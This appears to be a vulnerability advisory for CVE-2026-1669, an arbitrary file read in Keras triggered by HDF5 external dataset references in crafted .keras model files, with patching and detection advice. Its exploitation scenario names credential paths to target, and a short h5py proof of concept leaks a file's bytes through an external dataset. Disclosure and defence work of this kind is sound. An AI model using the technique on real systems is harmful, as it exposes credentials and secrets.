CVE-2026-1669

GHSA-3m4q-jmj6-r34q HIGH
Published February 11, 2026
CISO Take

CVE-2026-1669 is a high-severity arbitrary file read in Keras 3.0.0–3.13.1 that requires no authentication or user interaction to exploit. Any system that loads .keras model files from untrusted sources — model APIs, MLOps pipelines, collaborative ML platforms — is at risk of credential and secrets exposure. Patch to a fixed Keras version immediately and enforce trusted-source-only model loading across all inference and training infrastructure.

Affected Systems

Package | Ecosystem | Vulnerable Range    | Patched
keras   | pip       | >= 3.13.0, < 3.13.2 | 3.13.2
keras   | pip       | >= 3.0.0, < 3.13.0  | No patch

Severity & Risk

CVSS 3.1
7.5 / 10
EPSS
0.0%
chance of exploitation in 30 days
KEV Status
Not in KEV
Sophistication
Trivial

Recommended Action

  1. PATCH: Upgrade Keras to the fixed release (3.13.2 or later). Monitor the official Keras changelog and GitHub advisory.
  2. WORKAROUND (if patching is not yet possible): Implement a custom model-loading wrapper that strips or rejects HDF5 external dataset references before passing the file to Keras.
  3. MODEL SOURCE CONTROL: Enforce cryptographic signing or hash verification for all model files loaded in production. Reject models from unverified sources at the pipeline ingestion layer.
  4. LEAST PRIVILEGE: Run model-loading processes with a restricted filesystem view (containers with read-only mounts, seccomp profiles) that limits accessible paths.
  5. DETECTION: Alert on file-read syscalls from Python/ML processes that touch sensitive paths (/etc, ~/.aws, .env, *.pem, *.key) during model loading. Deploy eBPF-based runtime monitoring (Falco or similar) on ML inference nodes.
  6. AUDIT: Inventory all Keras versions deployed across training, serving, and evaluation environments, including transitive dependencies via pip freeze.
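The hash-verification gate from the model source control step can be sketched in standard-library Python. The digest table and function names below are illustrative, not part of any Keras or pip API; in a real deployment the digests would come from a signed registry:

```python
import hashlib
from pathlib import Path

# Illustrative allowlist of trusted model digests. In practice this table
# would be populated from a signed artifact registry, not hard-coded.
TRUSTED_SHA256 = {
    "sentiment-v3.keras": "0" * 64,  # placeholder digest
}

def verify_model_file(path: str, expected_sha256: str) -> bool:
    """Return True only if the file's SHA-256 matches the pinned digest."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            h.update(chunk)
    return h.hexdigest() == expected_sha256

def load_model_verified(path: str):
    """Gate keras.models.load_model() behind digest verification."""
    name = Path(path).name
    expected = TRUSTED_SHA256.get(name)
    if expected is None or not verify_model_file(path, expected):
        raise PermissionError(f"Refusing to load unverified model: {path}")
    # Only now hand the file to Keras (import deferred so the gate is cheap).
    import keras
    return keras.models.load_model(path)
```

Placing this gate at the pipeline ingestion layer, rather than inside application code, ensures unverified files never reach a Keras process in the first place.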

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity
Article 9 - Risk management system
ISO 42001
A.6.1.2 - AI risk assessment
A.6.1.3 - AI system supply chain
A.8.3 - AI system security
A.8.4 - AI system resources — data and tools for AI system
NIST AI RMF
GOVERN 1.4 - Organizational teams are committed to a culture that considers and communicates AI risk
GOVERN 1.7 - Processes for AI risk — third-party dependencies
MANAGE 2.2 - Mechanisms to sustain AI risk management
OWASP LLM Top 10
LLM03:2025 - Supply Chain Vulnerabilities
LLM04 - Model Supply Chain

Technical Details

NVD Description

Arbitrary file read in the model loading mechanism (HDF5 integration) in Keras versions 3.0.0 through 3.13.1 on all supported platforms allows a remote attacker to read local files and disclose sensitive information via a crafted .keras model file utilizing HDF5 external dataset references.

Exploitation Scenario

Adversary crafts a .keras model file embedding HDF5 external dataset references pointing to high-value local paths: /proc/1/environ (environment variables), ~/.aws/credentials, /run/secrets/*, or .env files common in Dockerized ML services. The file is published to a public model hub (e.g., HuggingFace) masquerading as a legitimate fine-tuned model, or submitted via a model evaluation API endpoint. When the target's automated pipeline or ML engineer calls keras.models.load_model() on this file, Keras resolves the external HDF5 references and reads the local files. In an inference API context, the resolved file contents surface in model metadata or error responses, disclosing credentials. An attacker with read access to cloud provider keys achieves full cloud account compromise from a single model file download.
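The external-dataset mechanism this scenario relies on can be reproduced with plain h5py (which exposes the `external=` keyword from h5py 2.9 onward). The file names and fake credentials below are self-contained stand-ins; no real target paths are read:

```python
import h5py

# Stand-in for a sensitive file on the loader's machine (e.g. a credentials
# file); created here so the example is self-contained.
SIZE = 64
with open("fake_credentials.txt", "wb") as f:
    f.write(b"AWS_SECRET=hunter2" + b"\x00" * (SIZE - 18))

# Attacker side: an HDF5 file whose dataset bytes are *backed by* an external
# path on disk instead of being stored inline in the container.
with h5py.File("malicious.h5", "w") as f:
    f.create_dataset(
        "weights",
        shape=(SIZE,),
        dtype="uint8",
        external=[("fake_credentials.txt", 0, SIZE)],
    )

# Victim side: an ordinary dataset read transparently pulls in the external
# file's bytes -- no Keras-specific code is needed to trigger the file read.
with h5py.File("malicious.h5", "r") as f:
    leaked = bytes(f["weights"][...])

print(leaked[:18])  # b'AWS_SECRET=hunter2'
```

Per the NVD description, Keras's HDF5 integration resolves such references during model loading, which is why rejecting files that contain external dataset metadata is an effective pre-load filter.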

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Timeline

Published
February 11, 2026
Last Modified
February 26, 2026
First Seen
February 11, 2026